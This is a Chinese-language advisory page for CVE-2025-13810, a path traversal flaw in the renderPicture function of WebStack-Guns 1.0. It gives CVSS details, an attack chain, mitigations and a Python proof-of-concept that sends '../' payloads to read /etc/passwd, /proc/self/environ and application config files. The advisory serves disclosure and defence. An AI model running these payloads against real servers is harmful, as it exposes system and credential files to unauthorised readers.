CVE-2025-13810 WebStack-Guns路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-13810

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

jsnjfz WebStack-Guns 1.0

漏洞概述

CVE-2025-13810是jsnjfz WebStack-Guns 1.0版本中的一个路径遍历（Path Traversal）漏洞。该漏洞存在于KaptchaController.java文件中的renderPicture函数，由于对用户输入的文件路径缺乏充分的验证和过滤，攻击者可以通过构造特殊的文件路径参数来访问服务器上的任意文件。漏洞的CVSS评分为5.3，属于中等严重程度。攻击向量为网络形式，无需认证和用户交互即可利用，机密性影响为低。该漏洞已于2025年12月1日披露，公开的漏洞利用代码已存在。开发者在早期已收到通知但未做出任何回应。由于该漏洞影响的是Java Web应用程序的控制器层，攻击者可能利用此漏洞读取敏感配置文件、源代码或其他服务器上的敏感文件，对系统安全造成潜在威胁。

技术细节

该路径遍历漏洞位于WebStack-Guns项目的KaptchaController.java文件中的renderPicture函数。漏洞的根本原因是在处理文件路径参数时未对用户输入进行安全验证。攻击者可以通过构造包含../的特殊路径序列来跳出预期的目录，访问服务器文件系统中的任意文件。具体来说，攻击者可能通过HTTP请求参数传入类似../../../etc/passwd的路径，服务器端代码在未进行路径规范化或边界检查的情况下直接使用该路径读取文件。由于漏洞存在于处理验证码图片的函数中，攻击者可以绕过正常的认证机制直接利用此漏洞。对于Java Web应用，建议使用Spring Framework的Path类或对路径进行严格的验证和过滤，确保用户输入的路径在允许的目录范围内。

攻击链分析

STEP 1

步骤1

攻击者识别目标WebStack-Guns 1.0应用并定位KaptchaController的renderPicture端点

STEP 2

步骤2

攻击者构造包含路径遍历序列（如../）的特殊请求参数

STEP 3

步骤3

服务器端renderPicture函数接收未经验证的文件路径参数

STEP 4

步骤4

应用使用用户提供的路径读取文件，未进行路径规范化或边界检查

STEP 5

步骤5

攻击者成功读取服务器任意文件，如/etc/passwd、配置文件、源代码等敏感文件

STEP 6

步骤6

利用获取的敏感信息进一步实施横向移动或权限提升攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13810 Path Traversal PoC for WebStack-Guns 1.0
# Target: KaptchaController.java renderPicture function

target_url = "http://target-server.com/kaptcha/renderPicture"

# Path traversal payloads to read sensitive files
payloads = [
    "../../../etc/passwd",
    "../../../windows/win.ini",
    "../../../proc/self/environ",
    "../../../WEB-INF/web.xml",
    "../../../application.properties"
]

for payload in payloads:
    try:
        params = {"path": payload}
        response = requests.get(target_url, params=params, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Success with payload: {payload}")
            print(f"Response length: {len(response.content)}")
            if b"root:" in response.content or b"[extensions]" in response.content:
                print(f"[+] Vulnerable! File content preview:")
                print(response.text[:500])
        else:
            print(f"[-] Failed with payload: {payload} (Status: {response.status_code})")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error with payload {payload}: {e}")

影响范围

WebStack-Guns 1.0

防御指南

临时缓解措施

在修复补丁发布之前，可通过以下措施临时缓解：1) 在Web应用防火墙(WAF)上配置规则，拦截包含../或路径遍历特征的请求；2) 限制Web应用运行账户的权限，确保其只能访问必要的文件；3) 对敏感文件目录设置严格的文件系统权限；4) 启用详细的访问日志监控异常文件访问行为；5) 考虑暂时禁用KaptchaController的renderPicture功能。